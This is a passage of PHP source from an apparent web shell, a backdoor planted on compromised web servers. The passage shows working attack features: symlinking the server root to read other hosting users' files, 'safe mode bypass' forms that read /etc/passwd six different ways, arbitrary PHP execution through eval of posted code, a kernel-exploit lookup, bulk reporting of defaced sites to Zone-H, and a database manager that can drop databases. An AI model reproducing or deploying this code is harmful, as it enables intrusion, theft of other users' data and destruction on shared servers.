2056                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2057                                                     echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
2058                                                     echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2059                                                 }
2060                                                 fclose($file);
2061                                                 echo "</table>";
2062                                             } else {
2063                                                 @mkdir("I47", 0777);
2064                                                 @chdir("I47");
2065                                                 execmd("ln -s / root");
2066                                                 $file3 = 'Options all 
2067            DirectoryIndex Sux.html 
2068            AddType text/plain .php 
2069            AddHandler server-parsed .php 
2070             AddType text/plain .html 
2071            AddHandler txt .html 
2072            Require None 
2073            Satisfy Any        
2074           ';
2075                                                 $fp3 = fopen('.htaccess', 'w');
2076                                                 $fw3 = fwrite($fp3, $file3);
2077                                                 @fclose($fp3);
2078                                                 echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2079                                                 $temp = "";
2080                                                 $val1 = 0;
2081                                                 $val2 = 1000;
2082                                                 for (;$val1 <= $val2;$val1++) {
2083                                                     $uid = @posix_getpwuid($val1);
2084                                                     if ($uid) $temp.= join(':', $uid) . "
2085 ";
2086                                                 }
2087                                                 echo '<br/>';
2088                                                 $temp = trim($temp);
2089                                                 $file5 = fopen("test.txt", "w");
2090                                                 fputs($file5, $temp);
2091                                                 fclose($file5);
2092                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2093                                                 while (!feof($file)) {
2094                                                     $s = fgets($file);
2095                                                     $matches = array();
2096                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2097                                                     $matches = str_replace("home/", "", $matches[1]);
2098                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2099                                                     echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
2100                                                     echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2101                                                 }
2102                                                 fclose($file);
2103                                                 echo "</table>";
2104                                                 unlink("test.txt");
2105                                             }
2106                                         }
2107                                     } else if (isset($_GET["symlinkfile"])) {
2108                                         if (!isset($_GET['file'])) {
2109 ?>
2110                    <center>
2111                    <form action="<?php echo $self; ?>">
2112                    <input type="hidden" name="symlinkserver">
2113                    <input type="hidden" name="symlinkfile">
2114                    <input type="text" class="box" name="file" size="50" value="">
2115                    <input type="submit" value="Create Symlink" class="but">
2116                    </form></center>
2117                    <br><br>
2118                    <?php
2119                                         } else {
2120                                             $fakedir = "cx";
2121                                             $fakedep = 16;
2122                                             $num = 0; // offset of symlink.$num
2123                                             if (!empty($_GET['file'])) $file = $_GET['file'];
2124                                             else if (!empty($_POST['file'])) $file = $_POST['file'];
2125                                             else $file = "";
2126                                             if (empty($file)) exit;
2127                                             if (!is_writable(".")) die("not writable directory");
2128                                             $level = 0;
2129                                             for ($as = 0;$as < $fakedep;$as++) {
2130                                                 if (!file_exists($fakedir)) mkdir($fakedir);
2131                                                 chdir($fakedir);
2132                                             }
2133                                             while (1 < $as--) chdir("..");
2134                                             $hardstyle = explode("/", $file);
2135                                             for ($a = 0;$a < count($hardstyle);$a++) {
2136                                                 if (!empty($hardstyle[$a])) {
2137                                                     if (!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]);
2138                                                     chdir($hardstyle[$a]);
2139                                                     $as++;
2140                                                 }
2141                                             }
2142                                             $as++;
2143                                             while ($as--) chdir("..");
2144                                             @rmdir("fakesymlink");
2145                                             @unlink("fakesymlink");
2146                                             @symlink(str_repeat($fakedir . "/", $fakedep), "fakesymlink");
2147                                             // this loop will skip already created symlinks.
2148                                             while (1) if (true == (@symlink("fakesymlink/" . str_repeat("../", $fakedep - 1) . $file, "symlink" . $num))) break;
2149                                             else $num++;
2150                                             @unlink("fakesymlink");
2151                                             mkdir("fakesymlink");
2152                                             die('<FONT COLOR="RED">check symlink <a href="./symlink' . $num . '">symlink' . $num . '</a> file</FONT>');
2153                                         }
2154                                     } else if (isset($_REQUEST["script"])) {
2155 ?>
2156            <center><table><tr><td><a href="<?php echo $self; ?>?manually&script&symlinkserver"><font color="lime" size="4">| Do It Manually |</font></a></td>
2157        <td><a href="<?php echo $self; ?>?automatic&script&symlinkserver"><font color="lime" size="4">| Do It Automatically |</font></a></td>
2158        </tr></table></center>
2159            <?php
2160                                         if (isset($_REQUEST['manually'])) {
2161                                             if (!isset($_REQUEST['passwd'])) {
2162 ?>
2163                <center>
2164                <form action="<?php echo $self; ?>" method="post">
2165                <input type="hidden" name="manually">
2166                <input type="hidden" name="script">
2167                <input type="hidden" name="symlinkserver">
2168                <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2169                <input type="submit" value="Get Config" class="but">
2170                </form>
2171                </center>
2172                <?php
2173                                             } else {
2174                                                 $getetc = trim($_REQUEST['passwd']);
2175                                                 mkdir("I47SPTS");
2176                                                 chdir("I47SPTS");
2177                                                 $myfile = fopen("test.txt", "w");
2178                                                 fputs($myfile, $getetc);
2179                                                 fclose($myfile);
2180                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2181                                                 while (!feof($file)) {
2182                                                     $s = fgets($file);
2183                                                     $matches = array();
2184                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2185                                                     $matches = str_replace("home/", "", $matches[1]);
2186                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2187                                                     syml($matches, $matches);
2188                                                 }
2189                                                 fclose($file);
2190                                                 unlink("test.txt");
2191                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2192                                                 echo "<br><center><a href=I47SPTS target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2193                                             }
2194                                         } else if (isset($_REQUEST['automatic'])) {
2195                                             $d0mains = @file("/etc/named.conf");
2196                                             if ($d0mains) {
2197                                                 mkdir("I47SPT");
2198                                                 chdir("I47SPT");
2199                                                 foreach ($d0mains as $d0main) {
2200                                                     if (eregi("zone", $d0main)) {
2201                                                         preg_match_all('#zone "(.*)"#', $d0main, $domains);
2202                                                         flush();
2203                                                         if (strlen(trim($domains[1][0])) > 2) {
2204                                                             $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
2205                                                             syml($user['name'], $domains[1][0]);
2206                                                         }
2207                                                     }
2208                                                 }
2209                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2210                                                 echo "<br><center><a href=I47SPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2211                                             } else {
2212                                                 mkdir("I47SPTS");
2213                                                 chdir("I47SPTS");
2214                                                 $temp = "";
2215                                                 $val1 = 0;
2216                                                 $val2 = 1000;
2217                                                 for (;$val1 <= $val2;$val1++) {
2218                                                     $uid = @posix_getpwuid($val1);
2219                                                     if ($uid) $temp.= join(':', $uid) . "
2220 ";
2221                                                 }
2222                                                 echo '<br/>';
2223                                                 $temp = trim($temp);
2224                                                 $file5 = fopen("test.txt", "w");
2225                                                 fputs($file5, $temp);
2226                                                 fclose($file5);
2227                                                 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2228                                                 while (!feof($file)) {
2229                                                     $s = fgets($file);
2230                                                     $matches = array();
2231                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2232                                                     $matches = str_replace("home/", "", $matches[1]);
2233                                                     if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
2234                                                     syml($matches, $matches);
2235                                                 }
2236                                                 fclose($file);
2237                                                 echo "</table>";
2238                                                 unlink("test.txt");
2239                                                 echo "<center><font color=lime size=3>[ Done ]</font></center>";
2240                                                 echo "<br><center><a href=I47SPTS target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2241                                             }
2242                                         }
2243                                     }
2244                                 }
2245                                 // Exploit Search
2246                                 else if (isset($_GET["exploit"])) {
2247                                     if (!isset($_GET["rootexploit"])) {
2248 ?>
2249            <center>
2250            <form action="<?php echo $self; ?>" method="get" target="_blank">
2251            <input type="hidden" name="exploit">
2252            <table border="1" cellpadding="5" cellspacing="4" style="width:50%;">
2253            <tr>
2254                <td style="height:60px;">
2255            <font size="4" color="lime">Select Website</font></td><td>
2256            <p><select id="rootexploit" name="rootexploit" class="box">
2257                <option value="exploit-db">Exploit-db</option>
2258                <option value="packetstormsecurity">Packetstormsecurity</option>
2259                <option value="exploitsearch">Exploitsearch</option>
2260                <option value="shodanhq">Shodanhq</option>
2261            </select></p></td></tr><tr><td colspan="2" align="center"  style="height:40px;">
2262            <input type="submit" value="Search" class="but"></td></tr></table>
2263            </form></center><br>
2264        
2265        <?php
2266                                     } else {
2267                                         //exploit search
2268                                         $Lversion = php_uname(r);
2269                                         $OSV = php_uname(s);
2270                                         if (eregi('Linux', $OSV)) {
2271                                             $Lversion = substr($Lversion, 0, 6);
2272                                             if ($_GET['rootexploit'] == "exploit-db") {
2273                                                 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
2274                                             } else if ($_GET['rootexploit'] == "packetstormsecurity") {
2275                                                 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
2276                                             } else if ($_GET['rootexploit'] == "exploitsearch") {
2277                                                 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
2278                                             } else if ($_GET['rootexploit'] == "shodanhq") {
2279                                                 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
2280                                             }
2281                                         } else {
2282                                             $Lversion = substr($Lversion, 0, 3);
2283                                             if ($_GET['rootexploit'] == "exploit-db") {
2284                                                 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
2285                                             } else if ($_GET['rootexploit'] == "packetstormsecurity") {
2286                                                 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
2287                                             } else if ($_GET['rootexploit'] == "exploitsearch") {
2288                                                 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
2289                                             } else if ($_GET['rootexploit'] == "shodanhq") {
2290                                                 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
2291                                             }
2292                                         }
2293                                         //End of Exploit search
2294                                         
2295                                     }
2296                                 } else if (isset($_POST["SendNowToZoneH"])) {
2297                                     $hacker = $_POST['defacer'];
2298                                     $method = $_POST['hackmode'];
2299                                     $neden = $_POST['reason'];
2300                                     $site = $_POST['domain'];
2301                                     if (empty($hacker)) {
2302                                         die("<center><font color=red size=3>[-] You Must Fill the Attacker name !</font></center>");
2303                                     } elseif ($method == "--------SELECT--------") {
2304                                         die("<center><font color=red size=3>[-] You Must Select The Method !</center>");
2305                                     } elseif ($neden == "--------SELECT--------") {
2306                                         die("<center><font color=red size=3>[-] You Must Select The Reason</center>");
2307                                     } elseif (empty($site)) {
2308                                         die("<center><font color=red size=3>[-] You Must Inter the Sites List !</center>");
2309                                     }
2310                                     $i = 0;
2311                                     $sites = explode("
2312 ", $site);
2313                                     echo "<pre class=ml1 style='margin-top:5px'>";
2314                                     while ($i < count($sites)) {
2315                                         if (substr($sites[$i], 0, 4) != "http") {
2316                                             $sites[$i] = "http://" . $sites[$i];
2317                                         }
2318                                         ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2319                                         echo "<font color=lime size=3>Site : " . $sites[$i] . " Posted !</font><br>";
2320                                         ++$i;
2321                                     }
2322                                     echo "<font color=lime size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2323                                 }
2324                                 // Spread Shell
2325                                 else if (isset($_GET["bypass"])) {
2326                                     if (isset($_GET['copy'])) {
2327                                         if (@copy($_GET['copy'], "test1.php")) {
2328                                             $fh = fopen("test1.php", 'r');
2329                                             echo "<textarea cols=120 rows=20 class=box readonly>" . htmlspecialchars(@fread($fh, filesize("test1.php"))) . "</textarea></br></br>";
2330                                             @fclose($fh);
2331                                             unlink("test1.php");
2332                                         }
2333                                     } else if (isset($_GET['imap'])) {
2334                                         $string = $_GET['imap'];
2335                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2336                                         $stream = imap_open($string, "", "");
2337                                         $str = imap_body($stream, 1);
2338                                         echo "</textarea>";
2339                                     } else if (isset($_GET['sql'])) {
2340                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2341                                         $file = $_GET['ssql'];
2342                                         $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2343                                         $mysql_files = explode(':', $mysql_files_str);
2344                                         $sql = array("USE $mdb", 'CREATE TEMPORARY TABLE ' . ($tbl = 'A' . time()) . ' (a LONGBLOB)', "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS " . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' " . "ESCAPED BY          '' " . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'", "SELECT a FROM $tbl LIMIT 1");
2345                                         mysql_connect($mhost, $muser, $mpass);
2346                                         foreach ($sql as $statement) {
2347                                             $q = mysql_query($statement);
2348                                             if ($q == false) die("FAILED: " . $statement . "
2349 " . "REASON: " . mysql_error() . "
2350 ");
2351                                             if (!$r = @mysql_fetch_array($q, MYSQL_NUM)) continue;
2352                                             echo htmlspecialchars($r[0]);
2353                                             mysql_free_result($q);
2354                                         }
2355                                         echo "</textarea>";
2356                                     } else if (isset($_GET['curl'])) {
2357                                         $ch = curl_init("file://" . $_GET[curl]);
2358                                         curl_setopt($ch, CURLOPT_HEADERS, 0);
2359                                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2360                                         $file_out = curl_exec($ch);
2361                                         curl_close($ch);
2362                                         echo "<textarea cols=120 rows=20 class=box readonly>" . htmlspecialchars($file_out) . "</textarea></br></br>";
2363                                     } else if (isset($_GET['include'])) {
2364                                         if (file_exists($_GET['include'])) {
2365                                             echo "<textarea cols=120 rows=20 class=box readonly>";
2366                                             @include ($_GET['include']);
2367                                             echo "</textarea>";
2368                                         } else echo "<br><center><font color=red size=3>Can't Read" . $_GET['include'] . "</font></center>";
2369                                     } else if (isset($_GET['id'])) {
2370                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2371                                         for ($uid = 0;$uid < 60000;$uid++) { //cat /etc/passwd
2372                                             $ara = posix_getpwuid($uid);
2373                                             if (!empty($ara)) {
2374                                                 while (list($key, $val) = each($ara)) {
2375                                                     print "$val:";
2376                                                 }
2377                                                 print "
2378 ";
2379                                             }
2380                                         }
2381                                         echo "</textarea>";
2382                                         break;
2383                                     } else if (isset($_GET['tempname'])) {
2384                                         tempnam("/home/" . $_GET['tempname']);
2385                                     } else if (isset($_GET['sym'])) {
2386                                         echo "<textarea cols=120 rows=20 class=box readonly>";
2387                                         $fp = fopen("hack15.txt", "w+");
2388                                         fwrite($fp, "Php Hacker Was Here");
2389                                         @unlink($flib);
2390                                         $sym = "/home/" . $them . "/public_html/" . $k;
2391                                         $link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
2392                                         @symlink($sym, $link);
2393                                         if ($k{0} == "/") {
2394                                             echo "<script> window.location = '" . $flib . "'</script>";
2395                                         } else {
2396                                             echo "<pre><xmp>";
2397                                             echo readlink($flib) . "
2398 ";
2399                                             echo "Filesize: " . linkinfo($flib) . "B
2400 
2401 ";
2402                                             echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
2403                                             echo "</textarea>";
2404                                         }
2405                                     } else {
2406 ?>
2407            
2408            <table cellpadding="7" align="center" border="3" style="width:70%;">
2409                <tr>
2410                    <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
2411                </tr>
2412                <tr>
2413                    <td align="center">
2414                        <p>Using copy() function</p>
2415                        <form action="<?php echo $self; ?>" method="get">
2416                        <input type="hidden" name="bypass">
2417                        <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2418                        </form>
2419                    </td>
2420                    <td align="center">
2421                        <p>Using imap() function</p>
2422                        <form action="<?php echo $self; ?>" method="get">
2423                        <input type="hidden" name="bypass">
2424                        <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2425                        </form>
2426                    </td>
2427                </tr>
2428                        
2429                <tr>
2430                    <td align="center">
2431                        <p>Using sql() function</p>
2432                        <form action="<?php echo $self; ?>" method="get">
2433                        <input type="hidden" name="bypass">
2434                        <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2435                        </form>
2436                    </td>
2437                    <td align="center">
2438                        <p>Using Curl() function</p>
2439                        <form action="<?php echo $self; ?>" method="get">
2440                        <input type="hidden" name="bypass">
2441                        <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2442                        </form>
2443                    </td>
2444                </tr>
2445                        
2446                <tr>
2447                    <td align="center">
2448                        <p>Bypass using include()</p>
2449                        <form action="<?php echo $self; ?>" method="get">
2450                        <input type="hidden" name="bypass">
2451                        <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2452                        </form>
2453                    </td>
2454                    <td align="center">
2455                        <p>Using id() function</p>
2456                        <form action="<?php echo $self; ?>" method="get">
2457                        <input type="hidden" name="bypass">
2458                        <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2459                        </form>
2460                    </td>
2461                </tr>
2462                            
2463                <tr>
2464                    <td align="center">
2465                        <p>Using tempnam() function</p>
2466                        <form action="<?php echo $self; ?>" method="get">
2467                        <input type="hidden" name="bypass">
2468                        <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2469                        </form>
2470                    </td>
2471                    <td align="center">
2472                        <p>Using symlink() function</p>
2473                        <form action="<?php echo $self; ?>" method="get">
2474                        <input type="hidden" name="bypass">
2475                        <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2476                        </form>
2477                    </td>
2478                </tr>
2479            </table>
2480            </form>
2481            <?php
2482                                     }
2483                                 } else if (isset($_GET["phpc"])) {
2484                                     // If the command was sent
2485                                     if (isset($_POST['code']) && $_POST['code'] && isset($_POST['intext']) && $_POST['intext'] == "disp") {
2486                                         // Filter some chars we don't need
2487                                         
2488 ?><br>
2489            <textarea name="code" class="box" cols="120" rows="10"><?php
2490                                         $code = str_replace("<?php", "", $_POST['code']);
2491                                         $code = str_replace("<?", "", $code);
2492                                         $code = str_replace("?>", "", $code);
2493                                         // Evaluate PHP code!
2494                                         htmlspecialchars(eval($code));
2495 ?>
2496            </textarea><?php
2497                                     } else if (isset($_POST['code']) && $_POST['code'] && !isset($_POST['intext'])) {
2498                                         $code = str_replace("<?php", "", $_POST['code']);
2499                                         $code = str_replace("<?", "", $code);
2500                                         $code = str_replace("?>", "", $code);
2501                                         // Evaluate PHP code!
2502                                         
2503 ?><br><font color="red" size="4">Result of execution this PHP-code :</font><br><font color="lime" size="3"><?php htmlspecialchars(eval($code)); ?></font><?php
2504                                     }
2505 ?>
2506     <form method="POST">
2507     <textarea name="code" class="box" cols="120" rows="10"><?php if (isset($_POST['code'])) {
2508                                         echo $_POST['code'];
2509                                     } else { ?>phpinfo();<?php
2510                                     } ?></textarea>
2511    <br /><br />
2512     <input name="submit" value="Execute This COde! " class="but" type="submit" />
2513    <input type="checkbox" name="intext" value="disp"> <font color="lime" size="3">Display in Textarea</font>
2514     </form>
2515     <?php
2516                                 } else if (isset($_GET['database'])) { ?>
2517    <form action=<?php echo $self; ?> method="POST">
2518    <table style="width:90%;" cellpadding="4" align="center">
2519    <tr>
2520        <td colspan="2">Connect To Database</td>
2521    </tr>
2522    <tr>
2523        <td>Server Address :</td>
2524        <td><input type="text" class="box" name="server" value="localhost"></td>
2525        <!--<td rowspan="4"><textarea name="query" cols="60" rows="7" class="box">SHOW DATABASE</textarea>-->
2526    </tr>
2527    <tr>
2528        <td>Username :</td>
2529        <td><input type="text" class="box" name="username" value="root"></td>
2530    </tr>
2531    <tr>
2532        <td>Password:</td>
2533        <td><input type="text" class="box" name="password" value=""></td>
2534    </tr>
2535    
2536    <tr>
2537        <td></td>
2538        <td><input type="submit" value="  Connect  " name="executeit" class="but"></td>
2539    </tr>
2540    </table>
2541    </form>
2542 <?php
2543                                 }
2544                                 // Execute Query
2545                                 else if (isset($_POST["executeit"])) {
2546                                     if (isset($_POST['username']) && isset($_POST['server'])) {
2547                                         $dbserver = $_POST['server'];
2548                                         $dbuser = $_POST['username'];
2549                                         $dbpass = $_POST['password'];
2550                                         setcookie("dbserver", $dbserver);
2551                                         setcookie("dbuser", $dbuser);
2552                                         setcookie("dbpass", $dbpass);
2553                                         header("Location:$self?data");
2554                                     }
2555                                 } else if (isset($_GET['data'])) {
2556                                     listdatabase();
2557                                 } else if (isset($_GET['viewdb'])) {
2558                                     listdatabase();
2559                                 } else if (isset($_GET['action']) && isset($_GET['dbname'])) {
2560                                     if ($_GET['action'] == "createDB") {
2561                                         $dbname = $_GET['dbname'];
2562                                         $dbserver = $_COOKIE["dbserver"];
2563                                         $dbuser = $_COOKIE["dbuser"];
2564                                         $dbpass = $_COOKIE["dbpass"];
2565                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2566                                         mysql_query("create database $dbname", $mysqlHandle);
2567                                         listdatabase();
2568                                     }
2569                                     if ($_GET['action'] == 'dropDB') {
2570                                         $dbname = $_GET['dbname'];
2571                                         $dbserver = $_COOKIE["dbserver"];
2572                                         $dbuser = $_COOKIE["dbuser"];
2573                                         $dbpass = $_COOKIE["dbpass"];
2574                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2575                                         mysql_query("drop database $dbname", $mysqlHandle);
2576                                         mysql_close($mysqlHandle);
2577                                         listdatabase();
2578                                     }
2579                                     if ($_GET['action'] == 'listTables') {
2580                                         listtable();
2581                                     }
2582                                     // Create Tables
2583                                     if ($_GET['action'] == "createtable") {
2584                                         $dbserver = $_COOKIE["dbserver"];
2585                                         $dbuser = $_COOKIE["dbuser"];
2586                                         $dbpass = $_COOKIE["dbpass"];
2587                                         $dbname = $_GET['dbname'];
2588                                         $tablename = $_GET['tablename'];
2589                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2590                                         mysql_select_db($dbname);
2591                                         mysql_query("CREATE TABLE $tablename ( no INT )");
2592                                         listtable();
2593                                     }
2594                                     // Drop Tables
2595                                     if ($_GET['action'] == "dropTable") {
2596                                         $dbserver = $_COOKIE["dbserver"];
2597                                         $dbuser = $_COOKIE["dbuser"];
2598                                         $dbpass = $_COOKIE["dbpass"];
2599                                         $dbname = $_GET['dbname'];
2600                                         $tablename = $_GET['tablename'];
2601                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2602                                         mysql_select_db($dbname);
2603                                         mysql_query("drop table $tablename");
2604                                         listtable();
2605                                     }
2606                                     // Empty Tables
2607                                     if ($_GET['action'] == "empty") {
2608                                         $dbserver = $_COOKIE["dbserver"];
2609                                         $dbuser = $_COOKIE["dbuser"];
2610                                         $dbpass = $_COOKIE["dbpass"];
2611                                         $dbname = $_GET['dbname'];
2612                                         $tablename = $_GET['tablename'];
2613                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2614                                         mysql_select_db($dbname);
2615                                         mysql_query("delete from $tablename");
2616                                         listtable();
2617                                     }
2618                                     // Drop Field
2619                                     if ($_GET['action'] == "dropField") {
2620                                         $dbserver = $_COOKIE["dbserver"];
2621                                         $dbuser = $_COOKIE["dbuser"];
2622                                         $dbpass = $_COOKIE["dbpass"];
2623                                         $dbname = $_GET['dbname'];
2624                                         $tablename = $_GET['tablename'];
2625                                         $fieldname = $_GET['fieldname'];
2626                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2627                                         mysql_select_db($dbname);
2628                                         $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
2629                                         mysql_select_db($dbname, $mysqlHandle);
2630                                         mysql_query($queryStr, $mysqlHandle);
2631                                         listtable();
2632                                     }
2633                                     // View Table Schema
2634                                     if ($_GET['action'] == "viewSchema") {
2635                                         $dbserver = $_COOKIE["dbserver"];
2636                                         $dbuser = $_COOKIE["dbuser"];
2637                                         $dbpass = $_COOKIE["dbpass"];
2638                                         $dbname = $_GET['dbname'];
2639                                         $tablename = $_GET['tablename'];
2640                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2641                                         mysql_select_db($dbname);
2642                                         echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2643                                         $pResult = mysql_query("SHOW fields FROM $tablename");
2644                                         $num = mysql_num_rows($pResult);
2645                                         echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
2646                                         echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
2647                                         for ($i = 0;$i < $num;$i++) {
2648                                             $field = mysql_fetch_array($pResult);
2649                                             echo "<tr>
2650 ";
2651                                             echo "<td>" . $field["Field"] . "</td>
2652 ";
2653                                             echo "<td>" . $field["Type"] . "</td>
2654 ";
2655                                             echo "<td>" . $field["Null"] . "</td>
2656 ";
2657                                             echo "<td>" . $field["Key"] . "</td>
2658 ";
2659                                             echo "<td>" . $field["Default"] . "</td>
2660 ";
2661                                             echo "<td>" . $field["Extra"] . "</td>
2662 ";
2663                                             $fieldname = $field["Field"];
2664                                             echo "<td><a href='$self?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>
2665 ";
2666                                             echo "</tr>
2667 ";
2668                                         }
2669                                         echo "</table>";
2670                                         echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2671                                     }
2672                                     // Execute Query
2673                                     if ($_GET['action'] == "executequery") {
2674                                         $dbserver = $_COOKIE["dbserver"];
2675                                         $dbuser = $_COOKIE["dbuser"];
2676                                         $dbpass = $_COOKIE["dbpass"];
2677                                         $dbname = $_GET['dbname'];
2678                                         $tablename = $_GET['tablename'];
2679                                         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2680                                         mysql_select_db($dbname);
2681                                         $result = mysql_query($_GET['executemyquery']);
2682                                         //  results
2683                                         echo "<html>
2684 " . strtoupper($_GET['executemyquery']) . "<br>
2685 <table border =\"1\">
2686 ";
2687                                         $count = 0;
2688                                         while ($row = mysql_fetch_assoc($result)) {
2689                                             echo "<tr>
2690 ";
2691                                             if ($count == 0) // list column names
2692                                             {
2693                                                 echo "<tr>
2694 ";
2695                                                 while ($key = key($row)) {
2696                                                     echo "<td><b>" . $key . "</b></td>
2697 ";
2698                                                     next($row);
2699                                                 }
2700                                                 echo "</tr>
2701 ";
2702                                             }
2703                                             foreach ($row as $r) // list content of column names
2704                                             {
2705                                                 if ($r == '') $r = '<font color=red>NULL</font>';
2706                                                 echo "<td><font color=lime>" . $r . "</font></td>
2707 ";
2708                                             }
2709                                             echo "</tr>
2710 ";
2711                                             $count++;
2712                                         }
2713                                         echo "</table>
2714 
2715 <font color=lime size=3>" . $count . " rows returned.</font>
2716 </html>";
2717                                         echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
2718                                     }
2719                                     // View Table Data
2720                                     if ($_GET['action'] == "viewdata") {
2721                                         global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
2722                                         $dbserver = $_COOKIE["dbserver"];
